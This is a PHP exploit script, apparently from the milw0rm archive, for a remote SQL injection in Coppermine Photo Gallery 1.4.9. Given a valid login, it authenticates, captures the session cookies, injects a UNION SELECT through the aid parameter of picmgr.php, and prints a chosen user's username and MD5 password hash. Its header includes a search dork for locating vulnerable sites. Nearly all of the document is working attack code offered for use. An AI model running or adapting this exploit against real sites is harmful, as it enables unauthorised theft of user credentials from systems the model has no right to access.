Code:
#!/usr/bin/php
<?php
/*********************************************************************
* Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability
*
* Note:
* Requires a valid user account.
*
* Usage:
* php script.php [host] [path] [table prefix] [user id] [username] [password]
*
* Usage Example:
* php script.php domain.com /coppermine/ cpg149_ 1 john secret
*
* Googledork"
* "Powered by Coppermine Photo Gallery"
*
* Credits:
* Disfigure - Vulnerability research and discovery
* Synsta - Exploit scripting
*
* [w4ck1ng] - w4ck1ng.com
*********************************************************************/
if(!$argv[6]){
die("Usage:
php $argv[0] [host] [path] [table prefix] [user id] [username] [password]n
Usage Example:
php $argv[0] domain.com /coppermine/ cpg149_ 1 john secretn");
}
if($argv[6]){
function send($host,$put){
global $data;
$conn = fsockopen(gethostbyname($host),"80");
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn,$put);
}
while(!feof($conn)) {
$data .=fgets($conn);
}
fclose($conn);
return $data;
}
$host = $argv[1];
$path = $argv[2];
$prefix = $argv[3];
$userid = $argv[4];
$userl = $argv[5];
$passl = $argv[6];
$post = "username=".urlencode($userl)."&password=".urlencode($passl)."&submitted=Login";
$req = "POST ".$path."login.php?referer=index.php HTTP/1.1rn";
$req .= "Referer: http://".$host.$path."login.php?referer=index.phprn";
$req .= "Host: $hostrn";
$req .= "Content-Type: application/x-www-form-urlencodedrn";
$req .= "Content-Length: ".strlen($post)."rn";
$req .= "Connection: Closern";
$req .= "Cache-Control: no-cachernrn";
$req .= $post;
send("$host","$req");
/* Borrowed from rgod. */
$temp = explode("Set-Cookie: ",$data);
$temp2 = explode(" ",$temp[1]);
$cookie = $temp2[0];
$temp2 = explode(" ",$temp[2]);
$cookie .= " ".str_replace(";","",$temp2[0]);
$cookie = str_replace("r","",$cookie);
$cookie = str_replace("n","",$cookie);
$sql = urlencode("123 UNION SELECT user_id,user_group,concat(user_name,char(58,58),user_password) FROM ".$prefix."users where user_id = ".$userid." --");
$req = "GET ".$path."picmgr.php?aid="."$sql HTTP/1.1rn";
$req .= "Host: $hostrn";
$req .= "Content-Type: application/x-www-form-urlencodedrn";
$req .= "Cookie: ".$cookie."rnrn";
$req .= "Connection: Closernrn";
send("$host","$req");
$gdata = explode("<option value="picture_no=1,picture_nm=",$data);
$ghash = explode(",action=0">",$gdata[1]);
$hash = $ghash[0];
$uname = explode("'",$hash);
$uname = explode("::",$uname[1]);
$username = $uname[0];
$fhash = explode("::",$hash);
$fhash = explode("',picture_sort=100",$fhash[1]);
$finalhash = $fhash[0];
if(strlen($finalhash) != 32){
die("Exploit failed..n");
}else{
die("Username: $username MD5: $finalhashn");
}
}
?>
# milw0rm.com [2006-10-27] |